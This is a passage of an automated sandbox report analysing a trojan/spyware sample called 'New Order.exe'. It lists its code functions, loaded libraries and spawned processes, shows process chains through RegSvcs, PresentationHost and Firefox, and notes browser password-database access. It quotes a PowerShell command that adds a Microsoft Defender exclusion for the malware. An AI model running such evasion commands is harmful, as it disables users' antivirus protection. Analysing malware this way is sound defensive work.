                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105F0E08_2_0105F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010570E98_2_010570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105132D8_2_0105132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBB2C08_2_00FBB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA52A08_2_00FA52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE739A8_2_00FE739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8D34C8_2_00F8D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010412ED8_2_010412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010575718_2_01057571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F914608_2_00F91460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103D5B08_2_0103D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010695C38_2_010695C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105F43F8_2_0105F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105F7B08_2_0105F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE56308_2_00FE5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010516CC8_2_010516CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010359108_2_01035910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA38E08_2_00FA38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100D8008_2_0100D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA99508_2_00FA9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBB9508_2_00FBB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE5AA08_2_00FE5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105FB768_2_0105FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01015BF08_2_01015BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FDDBF98_2_00FDDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01057A468_2_01057A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105FA498_2_0105FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01013A6C8_2_01013A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBFB808_2_00FBFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01041AA38_2_01041AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103DAAC8_2_0103DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104DAC68_2_0104DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01051D5A8_2_01051D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01057D738_2_01057D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01019C328_2_01019C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBFDC08_2_00FBFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA3D408_2_00FA3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105FCF28_2_0105FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105FF098_2_0105FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA9EB08_2_00FA9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105FFB18_2_0105FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F63FD58_2_00F63FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F63FD28_2_00F63FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA1F928_2_00FA1F92
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E053514_2_045E0535
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_046365D014_2_046365D0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_046365B214_2_046365B2
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045FC6E014_2_045FC6E0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E077014_2_045E0770
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0460475014_2_04604750
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0462600014_2_04626000
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045D010014_2_045D0100
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_046602C014_2_046602C0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EE3F014_2_045EE3F0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E0C0014_2_045E0C00
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045D0CF214_2_045D0CF2
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EED7A14_2_045EED7A
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EAD0014_2_045EAD00
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E8DC014_2_045E8DC0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045F8DBF14_2_045F8DBF
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E0E5914_2_045E0E59
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045F2ED914_2_045F2ED9
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04654F4014_2_04654F40
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04622F2814_2_04622F28
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04600F3014_2_04600F30
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045D2FC814_2_045D2FC8
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0465EFA014_2_0465EFA0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EA84014_2_045EA840
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0460E8F014_2_0460E8F0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045D28F014_2_045D28F0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045C68F114_2_045C68F1
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0461889014_2_04618890
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045F696214_2_045F6962
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E2A4514_2_045E2A45
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045DEA8014_2_045DEA80
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_046274E014_2_046274E0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E349714_2_045E3497
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EB73014_2_045EB730
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0461516C14_2_0461516C
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045CF17214_2_045CF172
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045EB1B014_2_045EB1B0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045FD2F014_2_045FD2F0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E52A014_2_045E52A0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E33F314_2_045E33F3
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04659C3214_2_04659C32
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045F9C2014_2_045F9C20
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E3D4014_2_045E3D40
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045FFDC014_2_045FFDC0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E9EB014_2_045E9EB0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E1F9214_2_045E1F92
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0464D80014_2_0464D800
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E38E014_2_045E38E0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E995014_2_045E9950
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045FB95014_2_045FB950
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045D197914_2_045D1979
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045E59DA14_2_045E59DA
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04653A6C14_2_04653A6C
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_04655BF014_2_04655BF0
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_0461DBF914_2_0461DBF9
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_045FFB8014_2_045FFB80
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_002C251014_2_002C2510
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_002BD56014_2_002BD560
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_002BD33714_2_002BD337
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 14_2_002BD34014_2_002BD340
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0063F1E615_2_0063F1E6
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0064B47B15_2_0064B47B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0066A42B15_2_0066A42B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_00653D1B15_2_00653D1B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0064967B15_2_0064967B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0065064B15_2_0065064B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_0064B69B15_2_0064B69B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_00651F1815_2_00651F18
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_00651F1B15_2_00651F1B
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_006497C115_2_006497C1
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 15_2_006497CB15_2_006497CB
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 16_2_0000022C1EA0C75C16_2_0000022C1EA0C75C
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 16_2_0000022C1EA0C3C416_2_0000022C1EA0C3C4
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 16_2_0000022C1EA0B82816_2_0000022C1EA0B828
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 16_2_0000022C1EA0C2A716_2_0000022C1EA0C2A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0101F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F8B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0100EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FD5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FE7E54 appears 111 times
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04627E54 appears 97 times
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 0464EA12 appears 37 times
                Source: New Order.exeStatic PE information: invalid certificate
                Source: New Order.exe, 00000000.00000002.1296172676.0000000005270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs New Order.exe
                Source: New Order.exe, 00000000.00000002.1284023525.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Order.exe
                Source: New Order.exe, 00000000.00000002.1305563111.0000000007040000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs New Order.exe
                Source: New Order.exe, 00000000.00000002.1285369631.0000000002724000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs New Order.exe
                Source: New Order.exeBinary or memory string: OriginalFilenamestnb.exe. vs New Order.exe
                Source: New Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, YNvBK2XsSJC1fts12G.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, YNvBK2XsSJC1fts12G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, PuxQbnZvf6IpBXQW6M.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, PuxQbnZvf6IpBXQW6M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, PuxQbnZvf6IpBXQW6M.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/7@5/5
                Source: C:\Users\user\Desktop\New Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npexb5nb.igx.ps1Jump to behavior
                Source: New Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\New Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.0000000002A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Order.exeReversingLabs: Detection: 55%
                Source: New Order.exeVirustotal: Detection: 59%
                Source: unknownProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: iertutil.dllJump to behavior
